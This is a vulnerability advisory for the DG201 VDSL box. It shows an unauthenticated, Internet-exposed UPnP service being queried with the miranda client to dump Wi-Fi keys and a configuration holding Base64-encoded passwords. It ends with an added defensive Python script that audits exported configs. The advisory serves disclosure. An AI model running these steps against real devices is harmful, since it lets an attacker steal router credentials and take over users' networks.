Intro
This vulnerability was reported on 2013-11-22 and was fixed a couple of months after that.
The DG201 VDSL box has some kind of UPnP service open to the Internet by default. Even if the box has been set to bridge mode, it will take its own public IP from the Internet.
From the UPnP service you can, for example, download the device configuration, which includes passwords etc. It is also possible to change the configuration of the device. Everything can be done without any authentication.
- Software version: DG201A-W2U4U_4.06DNT0934.2
Details
The UPnP service can be found on port TCP 49431.
Get a UPnP client and start using the service. I used miranda: https://code.google.com/p/miranda-upnp/
Example
I have manually added my public IP to the configuration, which is basically a list of hosts in a Python pickle.

```
$ python miranda.py -s upnp-inteno.mir

Miranda v1.3
The interactive UPnP client
Craig Heffner, http://www.devttys0.com

Host data restored:

[0] 10.0.2.187:8888
[1] 192.168.1.1:49431
[2] 192.168.1.1:49431
[3] 213.216.x.x:49431
[4] 85.131.x.x:49431

upnp> host get 3
Requesting device and service info for 213.216.x.x:49431 (this could take a few seconds)...
Host data enumeration complete!

upnp> host send 3 LANDevice WLANConfiguration GetSecurityKeys
NewWEPKey3 : 1234567890123
NewWEPKey2 : 1234567890123
NewWEPKey1 : 1234567890123
NewWEPKey0 : 1234567890123
NewKeyPassphrase :
NewPreSharedKey : abbaabba

upnp> host send 3 InternetGatewayDevice DeviceConfig GetConfiguration
NewConfigFile : <?xml version="1.0"?>
<DslCpeConfig version="3.0">
  <InternetGatewayDevice>
    <LANDeviceNumberOfEntries>1</LANDeviceNumberOfEntries>
    <WANDeviceNumberOfEntries>3</WANDeviceNumberOfEntries>
    <DeviceInfo>
      <ProvisioningCode>12345</ProvisioningCode>
      <FirstUseDate>2012-04-11T14:46:01+00:00</FirstUseDate>
      <VendorConfigFileNumberOfEntries>0</VendorConfigFileNumberOfEntries>
    </DeviceInfo>
    <X_BROADCOM_COM_SyslogCfg>
      <Status>Enabled</Status>
      <Option>local buffer and remote</Option>
      <LocalDisplayLevel>Debug</LocalDisplayLevel>
      <ServerIPAddress>10.0.0.1</ServerIPAddress>
    </X_BROADCOM_COM_SyslogCfg>
    <X_BROADCOM_COM_LoginCfg>
      <SupportPassword>ZG5hcjNzY3VlMTEyAA==</SupportPassword>
      <UserPassword>dXNlcgo=</UserPassword>
    </X_BROADCOM_COM_LoginCfg>
...
```
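For owners of an affected device, the following added example (not part of the original advisory or of miranda) audits an exported `DslCpeConfig` backup and lists which secret-looking elements are stored as reversible Base64, which is an encoding rather than encryption, so those credentials should be rotated once the configuration has been exposed. The tag-name heuristic, the function names and the sample secrets are assumptions constructed for illustration; only the element names come from the excerpt above.

```python
import base64
import xml.etree.ElementTree as ET

# Assumed heuristic: tag-name fragments that suggest a stored secret.
SECRET_HINTS = ("password", "passphrase", "key")

# Constructed secrets (not real device values); the Base64 form with a
# trailing NUL or newline is an assumption about how such fields are stored.
SUPPORT_B64 = base64.b64encode(b"example-support\x00").decode("ascii")
USER_B64 = base64.b64encode(b"example-user\n").decode("ascii")
SAMPLE_CONFIG = f"""<?xml version="1.0"?>
<DslCpeConfig version="3.0">
  <InternetGatewayDevice>
    <DeviceInfo><ProvisioningCode>12345</ProvisioningCode></DeviceInfo>
    <X_BROADCOM_COM_LoginCfg>
      <SupportPassword>{SUPPORT_B64}</SupportPassword>
      <UserPassword>{USER_B64}</UserPassword>
    </X_BROADCOM_COM_LoginCfg>
  </InternetGatewayDevice>
</DslCpeConfig>"""

def classify(value):
    """Return (storage, secret_length) without exposing the secret itself."""
    try:
        raw = base64.b64decode(value, validate=True)
        text = raw.rstrip(b"\x00\r\n").decode("ascii")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return "literal", len(value)
    if text and text.isprintable():
        return "base64-reversible", len(text)
    return "literal", len(value)

def audit_config(xml_text):
    """List (path, storage, secret_length) for every secret-looking element."""
    findings = []

    def walk(node, path):
        here = f"{path}/{node.tag}"
        text = (node.text or "").strip()
        if text and any(hint in node.tag.lower() for hint in SECRET_HINTS):
            findings.append((here, *classify(text)))
        for child in node:
            walk(child, here)

    walk(ET.fromstring(xml_text), "")
    return findings

if __name__ == "__main__":
    for path, storage, length in audit_config(SAMPLE_CONFIG):
        print(f"{storage:18} len={length:<3} {path}")
```

The classification is a heuristic: a short literal password that happens to be valid Base64 can be misreported, so treat every listed element as exposed regardless of its storage label.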
Contacts
- Mikko Kenttälä, Turmio @ IRCnet, mikko.kenttala(ä)iki.fi